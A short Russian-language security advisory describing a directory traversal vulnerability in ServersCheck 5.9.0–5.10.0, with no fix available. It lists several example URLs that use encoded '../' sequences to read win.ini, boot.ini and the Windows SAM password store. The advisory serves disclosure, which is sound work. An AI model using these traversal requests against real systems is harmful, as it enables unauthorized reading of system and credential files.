Обход каталога в ServersCheck

Дата публикации:	31.05.2005
Всего просмотров:	1276
Опасность:	Низкая
Наличие исправления:
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:
	Уязвимые версии: ServersCheck 5.9.0 - 5.10.0 Описание: Уязвимость позволяет удаленному авторизованному пользователю просмотреть произвольные файлы на системе. Удаленный авторизованный пользователь может с помощью специально сформированного URL просмотреть произвольные файлы на системе. Пример: http://[target]:1272/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini http://[target]:1272/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boo t.ini http://[target]:1272/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam http://[target]:1272/.../.../.../.../.../.../.../.../.../boot.ini http://[target]:1272/../../ ../../../../../../../boot.ini http://[target]:1272/../../../../../../../../boot.ini http://[target]:1272/../../../../boot.ini URL производителя: www.serverscheck.com Решение: Способов устранения уязвимости не существует в настоящее время.
Ссылки:	serverscheck 5.9 trasversal url bug

Обход каталога в ServersCheck

Подпишитесь на email рассылку